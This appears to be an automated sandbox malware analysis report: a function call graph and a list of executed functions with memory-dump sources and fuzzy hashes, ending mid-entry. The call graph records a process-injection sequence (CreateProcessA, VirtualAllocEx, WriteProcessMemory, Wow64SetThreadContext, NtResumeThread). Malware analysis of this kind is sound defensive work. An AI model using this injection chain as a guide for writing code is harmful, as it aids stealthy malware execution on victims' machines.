54994->55000 55001 5e5786b 15 API calls 54994->55001 54995 5e577e3 54995->54981 54996->54995 54997->54995 54998->54995 54999->54995 55000->54995 55001->54995 55004 5e5784f 55002->55004 55003 5e57abe 55003->54986 55004->55003 55026 5e58b41 55004->55026 55008 5e57822 55006->55008 55007 5e57abe 55007->54986 55008->55007 55009 5e58b41 15 API calls 55008->55009 55009->55008 55012 5e57822 55010->55012 55011 5e57abe 55011->54986 55012->55011 55013 5e58b41 15 API calls 55012->55013 55013->55012 55016 5e5784f 55014->55016 55015 5e57abe 55015->54986 55016->55015 55017 5e58b41 15 API calls 55016->55017 55017->55016 55019 5e57abe 55018->55019 55020 5e5784f 55018->55020 55019->54986 55020->55019 55021 5e58b41 15 API calls 55020->55021 55021->55020 55024 5e5784f 55022->55024 55023 5e57abe 55023->54986 55024->55023 55025 5e58b41 15 API calls 55024->55025 55025->55024 55027 5e58b65 55026->55027 55030 5e58eed 55027->55030 55031 5e58eef 55030->55031 55035 5e59359 55031->55035 55050 5e59368 55031->55050 55032 5e58f1a 55036 5e59368 55035->55036 55037 5e5939f 55036->55037 55065 5e59d83 55036->55065 55071 5e59701 55036->55071 55075 5e59e61 55036->55075 55080 5e5a11a 55036->55080 55086 5e59a9f 55036->55086 55091 5e5a29d 55036->55091 55097 5e5a070 55036->55097 55102 5e5a210 55036->55102 55108 5e59cca 55036->55108 55114 5e598e8 55036->55114 55120 5e59b88 55036->55120 55126 5e59849 55036->55126 55037->55032 55051 5e5937d 55050->55051 55052 5e5939f 55051->55052 55053 5e59e61 3 API calls 55051->55053 55054 5e59701 3 API calls 55051->55054 55055 5e59d83 3 API calls 55051->55055 55056 5e59849 3 API calls 55051->55056 55057 5e59b88 3 API calls 55051->55057 55058 5e598e8 3 API calls 55051->55058 55059 5e59cca 3 API calls 55051->55059 55060 5e5a210 3 API calls 55051->55060 55061 5e5a070 3 API calls 55051->55061 55062 5e5a29d 3 API calls 55051->55062 55063 5e59a9f 3 API calls 55051->55063 55064 5e5a11a 3 API calls 55051->55064 55052->55032 55053->55052 55054->55052 55055->55052 55056->55052 55057->55052 55058->55052 55059->55052 55060->55052 55061->55052 55062->55052 55063->55052 55064->55052 55066 5e59d8d 55065->55066 55066->55065 55067 5e5a21d 55066->55067 55132 5e3d5a0 55066->55132 55136 5e3d598 55066->55136 55140 5e3d550 55066->55140 55145 5e5c141 55071->55145 55151 5e5c150 55071->55151 55072 5e59719 55076 5e59e79 55075->55076 55170 5e5a980 55076->55170 55174 5e5a970 55076->55174 55077 5e594b5 55081 5e5a22d 55080->55081 55082 5e594b5 55080->55082 55083 5e3ccc0 Wow64SetThreadContext 55081->55083 55084 5e3cc7a Wow64SetThreadContext 55081->55084 55085 5e3ccc8 Wow64SetThreadContext 55081->55085 55083->55082 55084->55082 55085->55082 55087 5e5a096 55086->55087 55196 5e5c008 55087->55196 55202 5e5c018 55087->55202 55088 5e5a0de 55088->55037 55092 5e5a2b8 55091->55092 55221 5e3d380 55092->55221 55225 5e3d388 55092->55225 55229 5e3d33a 55092->55229 55093 5e594b5 55098 5e5a07a 55097->55098 55100 5e5c008 3 API calls 55098->55100 55101 5e5c018 3 API calls 55098->55101 55099 5e5a0de 55099->55037 55100->55099 55101->55099 55103 5e5a21d 55102->55103 55104 5e59d83 55102->55104 55104->55102 55105 5e3d5a0 NtResumeThread 55104->55105 55106 5e3d550 NtResumeThread 55104->55106 55107 5e3d598 NtResumeThread 55104->55107 55105->55104 55106->55104 55107->55104 55109 5e59ce9 55108->55109 55111 5e3d380 WriteProcessMemory 55109->55111 55112 5e3d33a WriteProcessMemory 55109->55112 55113 5e3d388 WriteProcessMemory 55109->55113 55110 5e594b5 55111->55110 55112->55110 55113->55110 55115 5e59900 55114->55115 55117 5e3d380 WriteProcessMemory 55115->55117 55118 5e3d33a WriteProcessMemory 55115->55118 55119 5e3d388 WriteProcessMemory 55115->55119 55116 5e59943 55116->55037 55117->55116 55118->55116 55119->55116 55121 5e59d83 55120->55121 55122 5e5a21d 55121->55122 55123 5e3d5a0 NtResumeThread 55121->55123 55124 5e3d550 NtResumeThread 55121->55124 55125 5e3d598 NtResumeThread 55121->55125 55123->55121 55124->55121 55125->55121 55127 5e5a096 55126->55127 55129 5e594b5 55126->55129 55130 5e5c008 3 API calls 55127->55130 55131 5e5c018 3 API calls 55127->55131 55128 5e5a0de 55128->55037 55130->55128 55131->55128 55133 5e3d5e9 NtResumeThread 55132->55133 55135 5e3d640 55133->55135 55135->55066 55137 5e3d5e9 NtResumeThread 55136->55137 55139 5e3d640 55137->55139 55139->55066 55141 5e3d53a 55140->55141 55141->55140 55142 5e3d53f 55141->55142 55143 5e3d60a NtResumeThread 55141->55143 55142->55066 55144 5e3d640 55143->55144 55144->55066 55146 5e5c165 55145->55146 55157 5e3ccc0 55146->55157 55161 5e3ccc8 55146->55161 55165 5e3cc7a 55146->55165 55147 5e5c17e 55147->55072 55152 5e5c165 55151->55152 55154 5e3ccc0 Wow64SetThreadContext 55152->55154 55155 5e3cc7a Wow64SetThreadContext 55152->55155 55156 5e3ccc8 Wow64SetThreadContext 55152->55156 55153 5e5c17e 55153->55072 55154->55153 55155->55153 55156->55153 55158 5e3cd11 Wow64SetThreadContext 55157->55158 55160 5e3cd89 55158->55160 55160->55147 55162 5e3cd11 Wow64SetThreadContext 55161->55162 55164 5e3cd89 55162->55164 55164->55147 55166 5e3ccbd Wow64SetThreadContext 55165->55166 55167 5e3cc87 55165->55167 55169 5e3cd89 55166->55169 55167->55147 55169->55147 55171 5e5a997 55170->55171 55172 5e5a9b9 55171->55172 55178 5e5b065 55171->55178 55172->55077 55175 5e5a980 55174->55175 55176 5e5a9b9 55175->55176 55177 5e5b065 3 API calls 55175->55177 55176->55077 55177->55176 55183 5e3c910 55178->55183 55187 5e3c8bf 55178->55187 55192 5e3c904 55178->55192 55185 5e3c990 CreateProcessA 55183->55185 55186 5e3cb8c 55185->55186 55190 5e3c8aa 55187->55190 55188 5e3c8ac 55189 5e3cb2f CreateProcessA 55191 5e3cb8c 55189->55191 55190->55187 55190->55188 55190->55189 55193 5e3c910 CreateProcessA 55192->55193 55195 5e3cb8c 55193->55195 55197 5e5c018 55196->55197 55208 5e3d1d8 55197->55208 55213 5e3d220 55197->55213 55217 5e3d228 55197->55217 55198 5e5c04f 55198->55088 55203 5e5c02d 55202->55203 55205 5e3d220 VirtualAllocEx 55203->55205 55206 5e3d1d8 VirtualAllocEx 55203->55206 55207 5e3d228 VirtualAllocEx 55203->55207 55204 5e5c04f 55204->55088 55205->55204 55206->55204 55207->55204 55209 5e3d21d 55208->55209 55210 5e3d1e7 55208->55210 55209->55210 55211 5e3d2a5 VirtualAllocEx 55209->55211 55210->55198 55212 5e3d2e4 55211->55212 55212->55198 55214 5e3d26c VirtualAllocEx 55213->55214 55216 5e3d2e4 55214->55216 55216->55198 55218 5e3d26c VirtualAllocEx 55217->55218 55220 5e3d2e4 55218->55220 55220->55198 55222 5e3d3d4 WriteProcessMemory 55221->55222 55224 5e3d46d 55222->55224 55224->55093 55226 5e3d3d4 WriteProcessMemory 55225->55226 55228 5e3d46d 55226->55228 55228->55093 55230 5e3d347 55229->55230 55231 5e3d37d WriteProcessMemory 55229->55231 55230->55093 55233 5e3d46d 55231->55233 55233->55093

                            Executed Functions

                            Function 05E20557 Relevance: 2.4, Strings: 1, Instructions: 1155COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: 7b1b1d890362fe3522bce1157656b082700981179d6fd3608675f163682f4114
                            • Instruction ID: 93b6740c1b6527f6498dce612d20bcf2152645d5c3b7e4a334737feff685b2de
                            • Opcode Fuzzy Hash: 7b1b1d890362fe3522bce1157656b082700981179d6fd3608675f163682f4114
                            • Instruction Fuzzy Hash: 5CB2E934A00228CFEB14CF95C998BADB7B6FB48704F158199E546AB3A9DB70DD81CF50
                            Function 05E2088F Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: d4a03f07cec3bb194f0b17791f1bbee3a0b4db2ea00a62e1df3ae4a284eb4c77
                            • Instruction ID: 0fc22ce97392f3c4492432390314f7454b214d0a623036cd318dc4235a54846c
                            • Opcode Fuzzy Hash: d4a03f07cec3bb194f0b17791f1bbee3a0b4db2ea00a62e1df3ae4a284eb4c77
                            • Instruction Fuzzy Hash: 84220934A00229CFEB14CF65C998FADB7B2FF48704F1491A9E54AAB295DB709D81CF50
                            Function 05E504BB Relevance: .3, Instructions: 258COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541389122.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e50000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec1cdf0dbe501b81c0a8309b155391cb1486741e3d661464df586ed1000f7e5b
                            • Instruction ID: 771f3ec3c9b0b3d0ae92449038896d5a2eef08ff9188273ff5aaba3262f1b5ce
                            • Opcode Fuzzy Hash: ec1cdf0dbe501b81c0a8309b155391cb1486741e3d661464df586ed1000f7e5b
                            • Instruction Fuzzy Hash: C8C1E874A05218CFEB64CF68D958BDDBBF2FB49314F2090AAD949A7290DB345E85CF40
                            Function 05E25E18 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID: d
                            • API String ID: 0-2564639436
                            • Opcode ID: 0d7c3901be3710c780669389fde7c1c49a61eaf6c832ff2569ad5f0c04eebe98
                            • Instruction ID: 399c4edd774ca64e7894399104aa3eb6d43fbad53bf7b8ae000fbbd7b58b0c43
                            • Opcode Fuzzy Hash: 0d7c3901be3710c780669389fde7c1c49a61eaf6c832ff2569ad5f0c04eebe98
                            • Instruction Fuzzy Hash: ECD18A30600616CFCB24CF29C484D6AB7F2FF88314B158A69E49A9B355DB30FC46CB95
                            Function 05E59CCA Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541389122.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e50000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;
                            • API String ID: 0-1661535913
                            • Opcode ID: dc46d33f6963796a833f400b4176d0aec20244b8fc690fc534cda56671261676
                            • Instruction ID: be6b0af3c71c1b64eea51f6c5a116f7193cb2e1590138684dbd088e21235007a
                            • Opcode Fuzzy Hash: dc46d33f6963796a833f400b4176d0aec20244b8fc690fc534cda56671261676
                            • Instruction Fuzzy Hash: 00218C74901268CFDB61CF24C884BECBBB2AB49314F1085EAD94DA7241DB359E85CF00
                            Function 05E59D83 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541389122.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e50000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID: )
                            • API String ID: 0-2427484129
                            • Opcode ID: cb43a04cfeea77de5e0b44c79ad78b5a1e107964cc45d3bc4ac51e8eed9dcefb
                            • Instruction ID: bc6e73afac391e28162f8ed7279f0b62e83d5117ec8f12e8223e70d9337aa9b6
                            • Opcode Fuzzy Hash: cb43a04cfeea77de5e0b44c79ad78b5a1e107964cc45d3bc4ac51e8eed9dcefb
                            • Instruction Fuzzy Hash: 63F07474A002598FDB54DF65D894ADDB7B5BB45300F5080AAC80EA7341DA35AE85CF50
                            Function 05E28F00 Relevance: .7, Instructions: 677COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7438b5de89aeddda8f1241bf87268244f38e925f197825f7e04aab230ec21a37
                            • Instruction ID: e8988e382f10a0b546ec8e430fcf508b5c6666b02343817278caecd280d52bf9
                            • Opcode Fuzzy Hash: 7438b5de89aeddda8f1241bf87268244f38e925f197825f7e04aab230ec21a37
                            • Instruction Fuzzy Hash: B1520775A002288FDB64CF69C991BEDBBF2BB88700F1581D9E549E7395DA309D80CF61
                            Function 05E2C0C7 Relevance: .6, Instructions: 573COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56b91fb587c3b92923305881979b85ad19cd74912cbd372c060383f82081606a
                            • Instruction ID: ff0ccd81f8da23fc2b04d84490426f73bedcf1867e7a1a0be7b3c0890d742c83
                            • Opcode Fuzzy Hash: 56b91fb587c3b92923305881979b85ad19cd74912cbd372c060383f82081606a
                            • Instruction Fuzzy Hash: 5022F3316093A49FD716AF78C860BDDBF71BF86304F1551DAC0899B297EA348C49CB92
                            Function 05E23440 Relevance: .5, Instructions: 534COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 717a61d5e890024c1ee1bfc361e23217d167ddeb9e1b5324fb3f11b6fe86f6b9
                            • Instruction ID: 286fd382dccd669e1cc65d356e59d99fd5caec2b11c4e4fd409a10d31c68e161
                            • Opcode Fuzzy Hash: 717a61d5e890024c1ee1bfc361e23217d167ddeb9e1b5324fb3f11b6fe86f6b9
                            • Instruction Fuzzy Hash: 8422BF75B002159FDB14CF69D494AAEBBB2FF88304F148469E942EB395DB75EC40CB90
                            Function 05E22858 Relevance: .5, Instructions: 520COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 28463f1ccd78c64c00274682829c29ebe87048c98c3516a1f9c5174c10bd9e20
                            • Instruction ID: d7497de5a9f1e5a3da4ad807071ba97d9d420c282a34b8e4fc66688ab36fde7e
                            • Opcode Fuzzy Hash: 28463f1ccd78c64c00274682829c29ebe87048c98c3516a1f9c5174c10bd9e20
                            • Instruction Fuzzy Hash: 3C227034E00229CFDB15CFA5C854AEDBBB2FF48704F148159E992A7398DB389D46CB94
                            Function 05E26360 Relevance: .5, Instructions: 479COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 04206a5c86f6bdaea34a545271383bf04e303158f6eff81c208c8e7858497f6b
                            • Instruction ID: 36947dc410d6a4a671b801f0dd6f21c425358d6ca8d3a2471480ac4ab1d2904f
                            • Opcode Fuzzy Hash: 04206a5c86f6bdaea34a545271383bf04e303158f6eff81c208c8e7858497f6b
                            • Instruction Fuzzy Hash: C9126B71A003158FDB25DFA9D494AAEBBB2FF88304F14852DE5869B354DF31AC45CB90
                            Function 05E2C308 Relevance: .4, Instructions: 437COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13ec8b6e3e2f9d14e10170818169d41f203bc2b340914a76c0a5fb951f3a65bd
                            • Instruction ID: da7f95cf90471c3dbabefd13430185ff79fbfc16b39c3731d0358fd0afc9fae3
                            • Opcode Fuzzy Hash: 13ec8b6e3e2f9d14e10170818169d41f203bc2b340914a76c0a5fb951f3a65bd
                            • Instruction Fuzzy Hash: A012FC34B102298FDB14EF64C894A9DB7B2BF89304F5095A8D58AAB355DF30ED85CF50
                            Function 05E28020 Relevance: .4, Instructions: 370COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c414f18e9c5d09458e4b828e1af069b9ccfc0a5cbc623ec3650b0acd9e8072f
                            • Instruction ID: df21efe1e9e5cf865362a1cc2bc694c1cb12608f5c8c443b227a0c699db8f412
                            • Opcode Fuzzy Hash: 4c414f18e9c5d09458e4b828e1af069b9ccfc0a5cbc623ec3650b0acd9e8072f
                            • Instruction Fuzzy Hash: DAF1CB34B10218DFDB18DFA4D998A9DBBB2FF89304F119558E846AB365DB70EC42CB50
                            Function 05E2CA00 Relevance: .4, Instructions: 358COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8163296ff8c80d982936c0a49113a7b8f11ad344e94fdc8f23cd3028409bb845
                            • Instruction ID: 5c4be65175c3fa7be97a58abec47e23806752be6c16125e3d5e690fbbb17e2c7
                            • Opcode Fuzzy Hash: 8163296ff8c80d982936c0a49113a7b8f11ad344e94fdc8f23cd3028409bb845
                            • Instruction Fuzzy Hash: C6E11F34B00219DFDB18DF64D5949AEBBB2FF89300F508569E946AB364DB30ED42CB91
                            Function 05E28EF0 Relevance: .3, Instructions: 287COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1ee2fa4d9e165673da0175439ca313d55c5c3811a014bd1e064d065336d32538
                            • Instruction ID: bd25eb048e376d7add74e445e7992142b8a24df44ce155b4ac276ec892ffbef0
                            • Opcode Fuzzy Hash: 1ee2fa4d9e165673da0175439ca313d55c5c3811a014bd1e064d065336d32538
                            • Instruction Fuzzy Hash: 77C16D75A002288FDB18CF69C995BDDBBF6FF88700F158099E549AB395CA309D81CF61
                            Function 05E23BC8 Relevance: .2, Instructions: 242COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d536ef55971986cd9d42e1ef7d98caacb3fdba3b9c41c2d764edaefdafb5251b
                            • Instruction ID: 71cecde0fa592c465930ba24136d7a0fe895d3eb2bbef9fad5a4126c253a5f2d
                            • Opcode Fuzzy Hash: d536ef55971986cd9d42e1ef7d98caacb3fdba3b9c41c2d764edaefdafb5251b
                            • Instruction Fuzzy Hash: 709112347002148FEB04DF29C494AAA7BF6BF89714F2184A9E546CB3A5DB75EC41CFA1
                            Function 05E28010 Relevance: .2, Instructions: 240COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 320495cfa10aef9d6121bb5c54c74d3421fd31f625da5cf919dc65622e61a958
                            • Instruction ID: 00e902dc1643155b411e2efce6aa74534042be130bc5129955f1eca8434caf92
                            • Opcode Fuzzy Hash: 320495cfa10aef9d6121bb5c54c74d3421fd31f625da5cf919dc65622e61a958
                            • Instruction Fuzzy Hash: 84B1DA34A14228DFCB08DFA4D898D9DBBB2FF89310F159559E946AB365DB70EC42CB40
                            Function 05E2C2F8 Relevance: .2, Instructions: 236COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53b1d4efb773ff64c845bcdd995eea6a4854c954fb728f63d027f54e916f78f1
                            • Instruction ID: 9aaae121709fd7f829f272c7d3162084b4dccc0f630ddafe18a9c32b6ba1c323
                            • Opcode Fuzzy Hash: 53b1d4efb773ff64c845bcdd995eea6a4854c954fb728f63d027f54e916f78f1
                            • Instruction Fuzzy Hash: FBA1EB34B102259FDB14DF24C894BADBBB2BF89304F5095A8E58AAB355DF70AD85CF40
                            Function 05E2D2B0 Relevance: .2, Instructions: 220COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c828356ec2ddf2292a06ddcd39c5219c7c843f8b5d336bb45b89d8c575eb7f0
                            • Instruction ID: 0a621723b27adbebdee03cd9a77220b431cd3778dbd115dd31f31036f18c930a
                            • Opcode Fuzzy Hash: 1c828356ec2ddf2292a06ddcd39c5219c7c843f8b5d336bb45b89d8c575eb7f0
                            • Instruction Fuzzy Hash: FF813B34710224DFDB14DF68D898A6DBBB6BF88710F108069E546DB3A5CB70EC42CB90
                            Function 05E24D28 Relevance: .2, Instructions: 208COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5785abbd2d631491d42c36550b9c1f9038c3fda571238d7fd4cd3cedb3fc9b8
                            • Instruction ID: 10683ae26f58873a2442dd71dc3c4fc84a5e73db6440e036a943c9fed9783af9
                            • Opcode Fuzzy Hash: f5785abbd2d631491d42c36550b9c1f9038c3fda571238d7fd4cd3cedb3fc9b8
                            • Instruction Fuzzy Hash: F5810675A00628CFEB14DF68C484E9DBBF6BF88314B1591A9E946DB364DB30EC41CB90
                            Function 05E2444B Relevance: .2, Instructions: 177COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c56112af6b42d8be6d5ef8996cc3b39622823f095c68249e8bc7f29abfa460d2
                            • Instruction ID: 410dc13452d2c6163c9cf67e1c6919d64da650cfdcb6e2b3287775bbf2295efa
                            • Opcode Fuzzy Hash: c56112af6b42d8be6d5ef8996cc3b39622823f095c68249e8bc7f29abfa460d2
                            • Instruction Fuzzy Hash: B55188317002158FEB15DF29D854BAE3BA2FF88348F548169E9468B3A4DF75DC42CB91
                            Function 05E505CD Relevance: .2, Instructions: 173COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541389122.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e50000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 96c6a119c9cb242359aa6c53d0f7a647cc7d0990a8069f8e99bcd0310f48b012
                            • Instruction ID: c5865535229f881f68a4336100e85c2005e72a1deb41e8cbe9f500da905cfbdd
                            • Opcode Fuzzy Hash: 96c6a119c9cb242359aa6c53d0f7a647cc7d0990a8069f8e99bcd0310f48b012
                            • Instruction Fuzzy Hash: 8781D3B0905318CFEB64CF68C958BDDBBF2BB49314F2090AAD949A7291DB345E84CF10
                            Function 05E2D2A0 Relevance: .2, Instructions: 163COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4fd822af5870df43acdee8ebcabd3b3b3122019ff04c16357140db13dcf45f77
                            • Instruction ID: cf093cf14e343d0012917d8f7c457ce737a394f0c3a743517b62eff24bae10bf
                            • Opcode Fuzzy Hash: 4fd822af5870df43acdee8ebcabd3b3b3122019ff04c16357140db13dcf45f77
                            • Instruction Fuzzy Hash: BE611935B106249FDB14DF68C898A6DB7B6FF88710F108169E946DB365DB70EC42CB90
                            Function 05E21E98 Relevance: .2, Instructions: 154COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b1aeacca0713aab61b551131c7453603b98eebd9bbc40df988dd4b142ca64b8
                            • Instruction ID: ee6fd129b4c2f0bb0fb56400a252349c99d7ce232a5e0c7595e556a404e55e5b
                            • Opcode Fuzzy Hash: 6b1aeacca0713aab61b551131c7453603b98eebd9bbc40df988dd4b142ca64b8
                            • Instruction Fuzzy Hash: 2E5177707003148FE719AF69C464A2EBBB3BF89604B50846DE9469B3A4DF35EC06CB95
                            Function 05E27628 Relevance: .2, Instructions: 150COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 717905d8e1588a8a0f06d37dacaf47f6f4dc246f9a17448c2b817e44e700d241
                            • Instruction ID: 86cc32c4463e2adf7125b1b6475e23fc554632c0e9dfd5ddee87427eb066a5a7
                            • Opcode Fuzzy Hash: 717905d8e1588a8a0f06d37dacaf47f6f4dc246f9a17448c2b817e44e700d241
                            • Instruction Fuzzy Hash: B451AF30A002098FD758DB79C8607AEBBF7BFC9300F14882CD54AAB345DF7499068BA1
                            Function 05E2A3F0 Relevance: .1, Instructions: 147COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
